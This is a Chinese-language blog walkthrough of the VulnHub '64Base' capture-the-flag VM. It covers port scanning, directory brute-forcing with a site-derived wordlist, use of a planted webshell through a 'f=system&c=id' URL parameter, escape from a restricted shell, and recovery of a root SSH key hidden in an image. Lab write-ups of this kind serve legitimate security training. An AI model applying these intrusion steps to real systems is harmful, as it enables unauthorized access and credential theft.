VM - 64Base_3mrgnc3 的破解

青蛙愛輪滑發表於2019-03-04

本文主要記錄對 64Base_3mrgnc3 的滲透學習過程,測試的 VM 主機主要來源 www.vulnhub.com
部落格集:面向 CTF 的 VM 破解系列
下載連結:64Base_3mrgnc3

  1. 首先設定靶機和kali在同一個網段中。然後用 netdiscover 發現IP

     root@kali:~# netdiscover -r 10.10.10.0/24
  Currently scanning: Finished!   |   Screen View: Unique Hosts
 
  4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240
  _____________________________________________________________________________
    IP            At MAC Address     Count     Len  MAC Vendor / Hostname
  -----------------------------------------------------------------------------
  10.10.10.1      00:50:56:c0:00:08      1      60  VMware, Inc.
  10.10.10.2      00:50:56:fb:16:b2      1      60  VMware, Inc.
  10.10.10.154    00:0c:29:60:fd:07      1      60  VMware, Inc.
  10.10.10.254    00:50:56:fe:24:e8      1      60  VMware, Inc.

  2. 可以確定靶機的IP是10.10.10.154嗎,下面使用 nmap 掃描開放的埠

     root@kali:~# nmap  10.10.10.154 -p 1-65535 -sT -T4
 Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-03 10:37 EST
 Nmap scan report for 10.10.10.154
 Host is up (0.0010s latency).
 Not shown: 65531 closed ports
 PORT      STATE SERVICE
 22/tcp    open  ssh
 80/tcp    open  http
 4899/tcp  open  radmin
 62964/tcp open  unknown
 MAC Address: 00:0C:29:60:FD:07 (VMware)

    由上可知,發現埠22、80、4899、62964,一種快速判斷埠的 banner 資訊的方式是 nc 或者 telnet

     root@kali:~# telnet 10.10.10.154 22
 Trying 10.10.10.154...
 Connected to 10.10.10.154.
 Escape character is '^]'.
 The programs included with the Fedora GNU/Linux system are free software;
 the exact distribution terms for each program are described in the
 individual files in /usr/share/doc/*/copyright.
 
 Fedora GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
 permitted by applicable law.
 Last login: Mon Oct 24 02:04:10 4025 from 010.101.010.001
 
 #

    提示資訊最後一次登入是215年,登入IP為 01.101.10.001,很顯然,這是虛假資訊。下面看一下 80 埠
    root@kali:~# nc -nv 10.10.10.154 80
    (UNKNOWN) [10.10.10.154] 80 (http) open

     HEAD / HTTP/1.0
 
 HTTP/1.1 200 OK
 Date: Mon, 25 Feb 2019 05:22:02 GMT
 Server: Apache/2.4.10 (Debian)
 Last-Modified: Tue, 06 Dec 2016 05:33:14 GMT
 ETag: "1fdf-542f6bd9b68a0"
 Accept-Ranges: bytes
 Content-Length: 8159
 Vary: Accept-Encoding
 Connection: close
 Content-Type: text/html

    顯示是正常的 apache web 伺服器。下面看一下 4899 埠

     root@kali:~# nc -nv 10.10.10.154 4899
 (UNKNOWN) [10.10.10.154] 4899 (radmin-port) open
 sshhh! ssh! droids!
 
 
 
 
 
 So..
 
 You found a way in then...
 
 but, can you pop root?
 
 
 
                                            /~\
                                           |oo )    Did you hear that?
                                           _\=/_
                           ___            /  _  \
                          / ()\          //|/.\|\\
                        _|_____|_        \\ \_/  ||
                       | | === | |        \|\ /| ||
                       |_|  O  |_|        # _ _/ #
                        ||  O  ||          | | |
                        ||__*__||          | | |
                       |~ \___/ ~|         []|[]
                       /=\ /=\ /=\         | | |
       ________________[_]_[_]_[_]________/_]_[_\_________________________

    由於回顯資訊中有55個空行,所以顯示區域會被頂上去。然而上面的顯示區域中還顯示了 sshhh! ssh! droids! ,這個應該不是 ssh 埠。下面看一下 62964 埠

     root@kali:~# nc -nv 10.10.10.154 62964
 (UNKNOWN) [10.10.10.154] 62964 (?) open
 SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3

    這個應該是真實的 SSH 埠

  3. 深度分析 80 埠的 web 網站

    使用瀏覽器開啟10.10.10.154 即可訪問網站主頁
    在這裡插入圖片描述

    很顯然可以看到有一串隨機字元

     root@kali:~# echo dmlldyBzb3VyY2UgO0QK | base64 --decode
 view source ;D

    根據提示資訊,讓我們檢視原始碼

    在這裡插入圖片描述

    可以看到原始碼中隨機字串 5a6d78685a7a4637546d705361566c59546d785062464a7654587056656c464953587055616b4a56576b644752574e7151586853534842575555684b6246524551586454656b5a77596d316a4d454e6e5054313943673d3d0a
    根據字串的格式判斷,不是 base64 編碼的,更像是 十六進位制編碼的,嘗試解碼,發現可以解碼之後發現結果是 base64 編碼的,再嘗試解碼

     root@kali:~# echo 5a6d78685a7a4637546d705361566c59546d785062464a7654587056656c464953587055616b4a56576b644752574e7151586853534842575555684b6246524551586454656b5a77596d316a4d454e6e5054313943673d3d0a | xxd -p -r | base64 --decode
 flag1{NjRiYXNlOlRoMzUzQHIzTjBUZGFEcjAxRHpVQHJlTDAwSzFpbmc0Cg==}

    這時候就得到了 flag1:flag1{NjRiYXNlOlRoMzUzQHIzTjBUZGFEcjAxRHpVQHJlTDAwSzFpbmc0Cg==}

    對flag1的結果解碼:

     root@kali:~# echo NjRiYXNlOlRoMzUzQHIzTjBUZGFEcjAxRHpVQHJlTDAwSzFpbmc0Cg==| base64 --decode
 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4

    在主頁中瀏覽其他選項卡,在 post 頁面中看到有很多線索,包括最下方的圖片

    影象說:

    IMPORTANT!!! USE SYSTEM INSTEAD OF EXEC TO RUN THE SECRET 5H377。

    以及它下面的評論說:

    Only respond if you are a real Imperial-Class BountyHunter

  4. 在主頁中已經無法找到有價值的資訊,下面開始進行列舉暴破

    使用 nikto 對網站進行列舉

     root@kali:~# nikto -host "http://10.10.10.154" -Display -output
 - Nikto v2.1.6
 ---------------------------------------------------------------------------
 + Target IP:          10.10.10.154
 + Target Hostname:    10.10.10.154
 + Target Port:        80
 + Start Time:         2019-03-03 09:13:59 (GMT-5)
 ---------------------------------------------------------------------------
 + Server: Apache/2.4.10 (Debian)
 
 + "robots.txt" contains 429 entries which should be manually viewed.
 + Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
 + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
 - STATUS: Completed 1500 requests (~22% complete, 14 seconds left): currently in plugin 'Nikto Tests'
 - STATUS: Running average: Not enough data.
 - STATUS: Completed 2000 requests (~29% complete, 15 seconds left): currently in plugin 'Nikto Tests'
 - STATUS: Running average: Not enough data.
 - STATUS: Completed 2500 requests (~36% complete, 12 seconds left): currently in plugin 'Nikto Tests'
 - STATUS: Running average: Not enough data.
 + OSVDB-3268: /img/: Directory indexing found.
 + OSVDB-3092: /img/: This might be interesting...
 + OSVDB-3268: /mail/: Directory indexing found.
 + OSVDB-3092: /mail/: This might be interesting...
 + OSVDB-3092: /members/: This might be interesting...
 + OSVDB-3092: /order/: This might be interesting...
 + OSVDB-3092: /staff/: This might be interesting...
 + OSVDB-3092: /manual/: Web server manual found.
 - STATUS: Completed 3000 requests (~43% complete, 12 seconds left): currently in plugin 'Nikto Tests'
 - STATUS: Running average: Not enough data.
 - STATUS: Completed 3500 requests (~50% complete, 10 seconds left): currently in plugin 'Nikto Tests'
 - STATUS: Running average: Not enough data.
 + OSVDB-3268: /manual/images/: Directory indexing found.
 - STATUS: Completed 4000 requests (~58% complete, 8 seconds left): currently in plugin 'Nikto Tests'
 - STATUS: Running average: Not enough data.
 + OSVDB-3233: /icons/README: Apache default file found.
 + OSVDB-3092: /as/: This might be interesting... potential country code (American Samoa)
 + OSVDB-3092: /by/: This might be interesting... potential country code (Belarus)
 + OSVDB-3092: /is/: This might be interesting... potential country code (Iceland)
 + OSVDB-3092: /no/: This might be interesting... potential country code (Norway)
 + OSVDB-3092: /to/: This might be interesting... potential country code (Tonga)
 - STATUS: Completed 4500 requests (~65% complete, 7 seconds left): currently in plugin 'Nikto Tests'
 - STATUS: Running average: Not enough data.
 - STATUS: Completed 5000 requests (~72% complete, 5 seconds left): currently in plugin 'Nikto Tests'
 - STATUS: Running average: Not enough data.
 - STATUS: Completed 5500 requests (~79% complete, 4 seconds left): currently in plugin 'Nikto Tests'
 - STATUS: Running average: Not enough data.
 - STATUS: Completed 6000 requests (~87% complete, 3 seconds left): currently in plugin 'Nikto Tests'
 - STATUS: Running average: Not enough data.
 - STATUS: Completed 6500 requests (~94% complete, 1 seconds left): currently in plugin 'Nikto Tests'
 - STATUS: Running average: Not enough data.
 - STATUS: Completed 7000 requests: currently in plugin 'Nikto Tests'
 - STATUS: Running average: Not enough data.
 + 8079 requests: 0 error(s) and 434 item(s) reported on remote host
 + End Time:           2019-03-03 09:14:21 (GMT-5) (22 seconds)
 ---------------------------------------------------------------------------
 + 1 host(s) tested
 root@kali:~#

    顯示有很多 robos.txt 檔案報錯

    “robots.txt” contains 429 entries which should be manually viewed

    正常情況下,robos.txt 檔案是不會產生報錯資訊的,所以嘗試另一種思路,進行網站的目錄暴破,通常我們只會對後臺管理頁面感興趣,但是那個會要求輸入密碼,所以只需要過濾 401響應程式碼的頁面

     root@kali:~# dirb http://10.10.10.154 | grep "CODE:401"
 + http://10.10.10.154/admin (CODE:401|SIZE:459)

    瀏覽器訪問提示需要使用者名稱和密碼

    我們嘗試使用flag1得出的類似於使用者名稱和密碼的結果(64base:Th353@r3N0TdaDr01DzU@reL00K1ing4)進行驗證測試

     root@kali:~# curl -u "64base:Th353@r3N0TdaDr01DzU@reL00K1ing4" -s http://10.10.10.154/admin
 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
 <html><head>
 <title>401 Unauthorized</title>
 </head><body>
 <h1>Unauthorized</h1>
 <p>This server could not verify that you
 are authorized to access the document
 requested.  Either you supplied the wrong
 credentials (e.g., bad password), or your
 browser doesn't understand how to supply
 the credentials required.</p>
 <hr>
 <address>Apache/2.4.10 (Debian) Server at 10.10.10.154 Port 80</address>
 </body></html>

    提示無法登陸成功,下面開始嘗試暴力破解。但是想要破解需要字典,此時可以嘗試資訊收集自己製作密碼字典。

  5. 製作暴破的密碼字典並開始暴破

    在這種情況下,我們可以通過遞迴複製部落格中的所有內容(包括robots.txt,HTML和JavaScript)來製作字典。使用wget正確的標誌允許我們將所有內容轉儲到單個檔案中。然後我們可以使用的工具html2dic,並 sort 把它清理乾淨,並將其轉換成可用單詞表。

    root@kali:~# wget http://10.10.10.154 -rq -O base64.out
    root@kali:~# ls -al base64.out
    -rw-r–r-- 1 root root 1869208 Dec 5 2016 base64.out
    root@kali:~# html2dic base64.out | sort -u > base64.dict
    root@kali:~# wc -l base64.dict
    12845 base64.dict

    使用密碼字典進行暴破目錄

    root@kali:~# dirb http://10.10.10.154 base64.dict | grep “CODE:401”

    發現還有一個目錄,訪問這個目錄(http://10.10.10.154/Imperial-Class/),然後使用密碼(64base:Th353@r3N0TdaDr01DzU@reL00K1ing4)登入,登入成功

    檢視頁面原始碼或者使用命令列登入:

     root@kali:~# curl -u '64base:Th353@r3N0TdaDr01DzU@reL00K1ing4' -s http://10.10.10.154/Imperial-Class/
 <!DOCTYPE html>
 <html lang="en">
 <body bgcolor=#000000><font color=#cfbf00>
 <title>64base - login</title>
 <h3>[☠] ERROR: incorrect path!.... TO THE DARK SIDE!</h3>
 <!-- don't forget the BountyHunter login -->

    提示資訊,不要忘記 BountyHunter 登入。那麼問題來了,在哪裡可以使用 BountyHunter 登入呢?

    突然想到前面提到圖片下面有提示資訊:

    Only respond if you are a real Imperial-Class BountyHunter

    此時,構建 URL:

    http:// 10.10.10.154/Imperial-Class/BountyHunter/

    發現需要登入才可以檢視

    此時,我們可以使用嘗試使用密碼登入,登入之後發現原來的URl“http://10.10.10.154/Imperial-Class/BountyHunter/”換成了
    http://10.10.10.154/Imperial-Class/BountyHunter/index.php”,雖然頁面一樣,但是原始碼是不一樣的,多了這行“<!-- basictoken=52714d544a54626d51315a45566157464655614446525557383966516f3d0a -->”,同時前面有兩個 id 都是隨機字元,嘗試拼接

    下面對這個隨機字串進行解碼

     root@kali:~# echo "5a6d78685a7a4a37595568534d474e4954545a4d65546b7a5a444e6a645756584f54466b53465a70576c4d31616d49794d485a6b4d6b597757544a6e4c3252714d544a54626d51315a45566157464655614446525557383966516f3d0a" | xxd -p -r | base64 --decode
 flag2{aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj12Snd5dEZXQTh1QQo=}

    得到 flag2,下面解密 flag2的內容

     root@kali:~# echo "aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj12Snd5dEZXQTh1QQo=" | base64 --decode
 https://www.youtube.com/watch?v=vJwytFWA8uA

    根據結果,訪問此視訊連結,發現視訊的名字提示使用 Burp

    不使用burp,而使用 curl 也是可以抓到這個 flag 的,這是因為 也可免重定向的時候瀏覽器無法載入,但是burp可以發現。

     root@kali:~# curl -u '64base:Th353@r3N0TdaDr01DzU@reL00K1ing4' -s http://10.10.10.154/Imperial-Class/BountyHunter/login.php | grep flag|cut -d{ -f2|cut -d} -f1|base64 -d
 53cr3t5h377/Imperial-Class/BountyHunter/login.php?f=exec&c=id

    訪問返回結果中的 URL,發現疑似 webshell

  6. 登入 webshell

    使用瀏覽器訪問頁面:http:// 10.10.10.154//Imperial-Class/BountyHunter/login.php?f=exec&c=id 無響應

    突然想到前天有提示:
    IMPORTANT!!! USE SYSTEM INSTEAD OF EXEC TO RUN THE SECRET 5H377

    構造 URL:
    http:// 10.10.10.154//Imperial-Class/BountyHunter/login.php?f=system&c=id
    獲得返回結果:

    結果中存在flag4:flag4{NjRiYXNlOjY0YmFzZTVoMzc3Cg==},並且知道當前使用者名稱為 id

    將flag4 進行解碼:

     root@kali:~# echo "NjRiYXNlOjY0YmFzZTVoMzc3Cg==" | base64 --decode
 64base:64base5h377

    得到結果為 64base5h377,下面將其進行編碼之後作為密碼登入 SSH

     root@kali:~# echo "64base5h377" | base64
 NjRiYXNlNWgzNzcK

    使用賬號密碼 64base:NjRiYXNlNWgzNzcK 即可登入 10.10.10.154 的 SSH 後臺

     root@kali:~# ssh 64base@10.10.10.154 -p 62964
 64base@10.10.10.154's password:
 Last login: Tue Dec  6 05:10:28 2016 from 172.16.0.18
 64base@64base:~$

    發現有些命令無法識別,但是有些命令只能列印出字元圖案

     64base@64base:~$ id
 -rbash: id: command not found
 64base@64base:~$ ls
 well_done_:D
 64base@64base:~$ pwd
 /64base
 64base@64base:~$

    下面進行測試發現 find,python,ruby 等很多命令都不能執行,但是 base64 可以執行

     64base@64base:~$ base64 well_done_:D | base64 --decode
 sshhh! ssh! droids!








 
 
 
 
 So..
 
 You found a way in then...
 
 but, can you pop root?
 
 
 
                                            /~\
                                           |oo )    Did you hear that?
                                           _\=/_
                           ___            /  _  \
                          / ()\          //|/.\|\\
                        _|_____|_        \\ \_/  ||
                       | | === | |        \|\ /| ||
                       |_|  O  |_|        # _ _/ #
                        ||  O  ||          | | |
                        ||__*__||          | | |
                       |~ \___/ ~|         []|[]
                       /=\ /=\ /=\         | | |
       ________________[_]_[_]_[_]________/_]_[_\_________________________
 
 
 64base@64base:~$

    另外有 env 命令可以執行

     64base@64base:~$ env
 TERM=xterm
 SHELL=/bin/rbash
 SSH_CLIENT=10.10.10.157 49858 62964
 SSH_TTY=/dev/pts/0
 USER=64base
 
 
 64base@64base:~$ echo $PATH/*
 /var/alt-bin/awk /var/alt-bin/base64 /var/alt-bin/cat /var/alt-bin/droids /var/alt-bin/egrep /var/alt-bin/env /var/alt-bin/fgrep /var/alt-bin/file /var/alt-bin/find /var/alt-bin/grep /var/alt-bin/head /var/alt-bin/less /var/alt-bin/ls /var/alt-bin/more /var/alt-bin/perl /var/alt-bin/python /var/alt-bin/ruby /var/alt-bin/tail
 64base@64base:~$

    對命令進行分析發現一個 /var/alt-bin/droids,這個命令很奇怪,執行

     64base@64base:~$ droids

  7. 發現已經打破了 shell 命令無法輸入的限制

     64base@64base:~$ echo $PATH
 /var/alt-bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
 
 64base@64base:~$ /bin/ls -la
 total 20
 drwxr-xr-x  2 root root 4096 Dec  6  2016 .
 drwxr-xr-x 22 root root 4096 Dec  6  2016 ..
 -rw-r--r--  1 root root 3602 Dec  6  2016 .bashrc
 -rw-r--r--  1 root root  183 Dec  6  2016 .profile
 ---S---r-x  1 root root  819 Dec  6  2016 well_done_:D
 
 64base@64base:~$ /bin/ls /
 64base  boot  etc   initrd.img  lost+found  mnt  proc  run   srv  tmp  var
 bin     dev   home  lib         media       opt  root  sbin  sys  usr  vmlinuz

    使用 find 命令查詢 flag5

     64base@64base:/var$ /usr/bin/find /var -name flag5*
 /var/www/html/admin/S3cR37/flag5{TG9vayBJbnNpZGUhIDpECg==}
 
 64base@64base:/var$ echo TG9vayBJbnNpZGUhIDpECg==|base64 -d
 Look Inside! :D
 
 64base@64base:/var$ file /var/www/html/admin/S3cR37/flag5{TG9vayBJbnNpZGUhIDpECg==}
 /var/www/html/admin/S3cR37/flag5{TG9vayBJbnNpZGUhIDpECg==}: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, comment: "4c5330744c5331435255644a546942535530456755464a4a566b4655525342", baseline, precision 8, 960x720, frames 3

    發現下面有 十六進位制,看一下是否是全面的

     64base@64base:/var$ strings /var/www/html/admin/S3cR37/flag5{TG9vayBJbnNpZGUhIDpECg==} | /usr/bin/head
 JFIF
 4c5330744c5331435255644a546942535530456755464a4a566b46555253424c52566b744c5330744c517051636d396a4c565235634755364944517352553544556c6c5156455645436b52460a5379314a626d5a764f69424252564d744d5449344c554e43517977324d6a46424d7a68425155513052546c475155457a4e6a55335130457a4f44673452446c434d7a553251776f4b625552300a556e684a643267304d464a54546b467a4d697473546c4a49646c4d356557684e4b325668654868564e586c795231424461334a6955566376556d64515543745352307043656a6c57636c52720a646c6c334e67705a59303931575756615457707a4e475a4a55473433526c7035536d64345230686f5533685262336857626a6c7252477433626e4e4e546b5270636e526a62304e50617a6c530a524546484e5756344f58673056453136436a684a624552435558453161546c5a656d6f35646c426d656d56435246706b53586f35524863795a323479553246465a335531656d56734b7a5a490a52303969526a686161444e4e53574e6f6554687a4d5668795254414b61335a4d53306b794e544a74656c64334e47746955334d354b31466856336c6f4d7a52724f45704a566e7031597a46520a51336c69656a56586231553157545532527a5a784d564a6b637a426959315a785446567a5a51704e5533704c617a4e745332465851586c4d574778764e3078756258467856555a4c5347356b0a516b557855326851566c5a704e47497752336c475355785054335a3062585a47596a5172656d68314e6d705056316c49436d73796147524453453554644374705a3264354f57686f4d3270680a52576456626c4e51576e56464e30354b6430525a5954646c553052685a3077784e31684c634774744d6c6c70516c5a7956566834566b31756232494b643168535a6a56435930644c56546b330a65475276636c59795648457261446c4c553278615a5463354f58527956484a475230356c4d4456326545527961576f315658517953324e52654373354f457334533342585441706e645570510a556c424c52326c71627a6b3253455248597a4e4d4e566c7a65453969566d63724c325a714d4546326330746d636d4e574c327834595663725357313562574d7854566870536b316962554e360a62455233436c52425632316863577453526b52355154464956585a30646c4e6c566e46544d533949616d6845647a6c6b4e45747a646e4e71613270326557565256484e7a5a6e4e6b52324e560a4d47684561316833556c647a6332514b4d6d517a5279744f616d3078556a56615445356e556d784f63465a48616d684c517a524263325a59557a4e4b4d486f7964444e4355453035576b39430a54554a6c4f5552344f4870744e58684757546c365633527964677042523342794d454a6f4f45745264323177616c4656597a46685a6e4e78595646594d465649546b7859564446615431644c0a616d63305530457a57454d355a454e4665555a784d464e4a65464671547a6c4d52304e48436a52524e57356a5a6c566f62585a3063586c3164454e7362444a6b5746427a57465a455a54526c0a6230517851327432536b354557544e4c554663725232744f4f5577724f554e516554677252453531626b5a4a6433674b4b3151724b7a64525a7939315546684c6354524e4e6a464a555467770a4d7a52566148565356314d30564846514f57463657444e44527a6c4d65573970516a5a57596b74505a555233546a68686157784d533170436377706d57546c524e6b464e4d584e3562476c360a53444675626e684c5433526155566431636e68715230704353584d324d6e526c6245317259584d356555354e617a4e4d64546478556b6732633364504f584e6b56454a70436974714d4867300a64555261616b706a5a30315965475a694d4863315154593062466c4763303153656b5a714e31686b5a6e6b784f53744e5a54684b525768524f45744f57455233555574456556564d526b39550a63336f4b4d544e575a6b4a4f65466c7a65557731656b6459546e703563566f3053533950547a644e5a575179616a4248656a426e4d6a4670534545764d445a74636e4d795932786b637a5a540a56554a4852585a754f4535705667707955334a494e6e5a46637a5254656d63776544686b5a45643255544278567a463254577455556e557a54336b765a544577526a63304e586845545546550a53314a7353316f32636c6c4954554e34536a4e4a59323530436b56364d45394e57466c6b517a5a4461555976535664305a3252564b32684c65585a7a4e484e4764454e4359327854595764740a5246524b4d6d74615a485530556c4a3357565a574e6d394a546e6f35596e4250646b554b556e677a534656785a6d354c553268796458704e4f56707261556c7264564e6d556e526d615531320a596c52365a6d5a4b56464d30597a513451303831574339535a5559765157464e654774695532524654305a7a53517047646a6c595a476b355532524f6458684853455579527a5249646b706b0a53584279526c5679566c4e7755306b344d48646e636d49794e44567a647a5a6e5647397064466f354d47684b4e47354b4e5746354e304648436c6c7059574531627a63344e7a63765a6e63320a57566f764d6c557a5155526b61564e50516d3072614770574d6b705765484a7665565659596b63315a475a734d32303452335a6d4e7a464b4e6a4a4753484534646d6f4b63557068626c4e720a4f4445334e586f77596d70795746646b5445637a52464e735355707063327851567974355247466d4e316c43566c6c33563149725645457861304d326157564a5154563056544e776269394a0a4d776f324e466f31625842444b3364785a6c52345232646c51334e6e53577335646c4e754d6e41765a5756305a456b7a5a6c46584f46645952564a69524756304d56564d5346427864456c700a4e314e61596d6f3464697451436d5a7553457852646b563353584d72516d59785133424c4d554672576d565654564a4655577443614552704e7a4a49526d4a334d6b6376656e46306153395a0a5a4735786545463562445a4d576e704a5a5646754f48514b4c3064714e477468636b6f78615530355357597a4f57524e4e55396851315a615569395554304a575956493462584a514e315a300a536d39794f57706c53444a305255777764473946635664434d56424c4d48565955416f744c5330744c55564f524342535530456755464a4a566b46555253424c52566b744c5330744c516f3d0a
 $Wbr
 %4568CDgt
 &9ESTVcsu
 '7FGdf
 (Uev
 #3Rbr
 mX$S(
 -E=m
 64base@64base:/var$

    將上面的 十六進位制進行解密

     64base@64base:/var$ echo "4c5330744c5336e704a5a5646754f48514b4c3064714e477468636b6f7861
 5530355357597a4f57524e4e55396851315a615569395554304a57595649346
 .....................
 .....................
 .....................
 2584a514e315a300a536d39794f57706c53444a305255777764473946635664
 434d56424c4d48565955416f744c5330744c55564f524342535530456755464
 a4a566b46555253424c52566b744c5330744c516f3d0a" | xxd -p -r | base64 --decode
 -----BEGIN RSA PRIVATE KEY-----
 Proc-Type: 4,ENCRYPTED
 DEK-Info: AES-128-CBC,621A38AAD4E9FAA3657CA3888D9B356C
 
 mDtRxIwh40RSNAs2+lNRHvS9yhM+eaxxU5yrGPCkrbQW/RgPP+RGJBz9VrTkvYw6
 YcOuYeZMjs4fIPn7FZyJgxGHhSxQoxVn9kDkwnsMNDirtcoCOk9RDAG5ex9x4TMz
 8IlDBQq5i9Yzj9vPfzeBDZdIz9Dw2gn2SaEgu5zel+6HGObF8Zh3MIchy8s1XrE0
 kvLKI252mzWw4kbSs9+QaWyh34k8JIVzuc1QCybz5WoU5Y56G6q1Rds0bcVqLUse
 MSzKk3mKaWAyLXlo7LnmqqUFKHndBE1ShPVVi4b0GyFILOOvtmvFb4+zhu6jOWYH
 k2hdCHNSt+iggy9hh3jaEgUnSPZuE7NJwDYa7eSDagL17XKpkm2YiBVrUXxVMnob
 wXRf5BcGKU97xdorV2Tq+h9KSlZe799trTrFGNe05vxDrij5Ut2KcQx+98K8KpWL
 guJPRPKGijo96HDGc3L5YsxObVg+/fj0AvsKfrcV/lxaW+Imymc1MXiJMbmCzlDw
 TAWmaqkRFDyA1HUvtvSeVqS1/HjhDw9d4KsvsjkjvyeQTssfsdGcU0hDkXwRWssd
 2d3G+Njm1R5ZLNgRlNpVGjhKC4AsfXS3J0z2t3BPM9ZOBMBe9Dx8zm5xFY9zWtrv
 AGpr0Bh8KQwmpjQUc1afsqaQX0UHNLXT1ZOWKjg4SA3XC9dCEyFq0SIxQjO9LGCG
 4Q5ncfUhmvtqyutCll2dXPsXVDe4eoD1CkvJNDY3KPW+GkN9L+9CPy8+DNunFIwx
 +T++7Qg/uPXKq4M61IQ8034UhuRWS4TqP9azX3CG9LyoiB6VbKOeDwN8ailLKZBs
 fY9Q6AM1sylizH1nnxKOtZQWurxjGJBIs62telMkas9yNMk3Lu7qRH6swO9sdTBi
 +j0x4uDZjJcgMXxfb0w5A64lYFsMRzFj7Xdfy19+Me8JEhQ8KNXDwQKDyULFOTsz
 13VfBNxYsyL5zGXNzyqZ4I/OO7Med2j0Gz0g21iHA/06mrs2clds6SUBGEvn8NiV
 rSrH6vEs4Szg0x8ddGvQ0qW1vMkTRu3Oy/e10F745xDMATKRlKZ6rYHMCxJ3Icnt
 Ez0OMXYdC6CiF/IWtgdU+hKyvs4sFtCBclSagmDTJ2kZdu4RRwYVV6oINz9bpOvE
 Rx3HUqfnKShruzM9ZkiIkuSfRtfiMvbTzffJTS4c48CO5X/ReF/AaMxkbSdEOFsI
 Fv9Xdi9SdNuxGHE2G4HvJdIprFUrVSpSI80wgrb245sw6gToitZ90hJ4nJ5ay7AG
 Yiaa5o7877/fw6YZ/2U3ADdiSOBm+hjV2JVxroyUXbG5dfl3m8Gvf71J62FHq8vj
 qJanSk8175z0bjrXWdLG3DSlIJislPW+yDaf7YBVYwWR+TA1kC6ieIA5tU3pn/I3
 64Z5mpC+wqfTxGgeCsgIk9vSn2p/eetdI3fQW8WXERbDet1ULHPqtIi7SZbj8v+P
 fnHLQvEwIs+Bf1CpK1AkZeUMREQkBhDi72HFbw2G/zqti/YdnqxAyl6LZzIeQn8t
 /Gj4karJ1iM9If39dM5OaCVZR/TOBVaR8mrP7VtJor9jeH2tEL0toEqWB1PK0uXP
 -----END RSA PRIVATE KEY-----
 64base@64base:/var$

    看起來這是一個 SSH 金鑰資訊,將其輸出到檔案

     64base@64base:/var$ echo "4c5330744c5336e704a5a5646754f48514b4c3064714e477468636b6f7861
 5530355357597a4f57524e4e55396851315a615569395554304a57595649346
 .....................
 .....................
 .....................
 2584a514e315a300a536d39794f57706c53444a305255777764473946635664
 434d56424c4d48565955416f744c5330744c55564f524342535530456755464
 a4a566b46555253424c52566b744c5330744c516f3d0a"  | xxd -p -r | base64 --decode > /tmp/ssh.key


 64base@64base:/tmp$ ls
 ssh.key

    使用公鑰進行登入

     64base@64base:/tmp$ ssh root@10.10.10.154 -p 62964 -i /tmp/ssh.key
 Could not create directory '/64base/.ssh'.
 The authenticity of host '[10.10.10.154]:62964 ([10.10.10.154]:62964)' can't be established.
 ECDSA key fingerprint is 97:94:13:38:92:70:6c:3a:c0:4f:f3:f3:e7:ce:40:91.
 Are you sure you want to continue connecting (yes/no)? yes
 Failed to add the host to the list of known hosts (/64base/.ssh/known_hosts).
 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
 @         WARNING: UNPROTECTED PRIVATE KEY FILE!          @
 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
 Permissions 0644 for '/tmp/ssh.key' are too open.
 It is recommended that your private key files are NOT accessible by others.
 This private key will be ignored.
 key_load_private_type: bad permissions
 root@10.10.10.154's password:

  8. kali 下載 flag5 檔案

    使用者名稱密碼:64base/NjRiYXNlNWgzNzcK

     root@kali:~# scp -P 62964 64base@10.10.10.154:/var/www/html/admin/S3cR37/flag5* flag5.jpeg
 64base@10.10.10.154's password:
 flag5{TG9vayBJbnNpZGUhIDpECg==}                                                           100%  192KB  46.5MB/s   00:00
 root@kali:~#

    開啟圖片看到,圖中有字

    使用圖中的字登入 usetheforce 作為密碼

     64base@64base:/$ ssh root@127.0.0.1 -p 62964 -i /tmp/ssh.key 
 Could not create directory '/64base/.ssh'.
 The authenticity of host '[127.0.0.1]:62964 ([127.0.0.1]:62964)' can't be established.
 ECDSA key fingerprint is 97:94:13:38:92:70:6c:3a:c0:4f:f3:f3:e7:ce:40:91.
 Are you sure you want to continue connecting (yes/no)? yes
 Failed to add the host to the list of known hosts (/64base/.ssh/known_hosts).
 Enter passphrase for key '/tmp/rsa-key': 
 
 Last login: Wed Dec  7 16:27:53 2016 from localhost
 
 flag6{NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNjg0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK}
 root@64base:~#

    得到 flag6 ,將其解碼

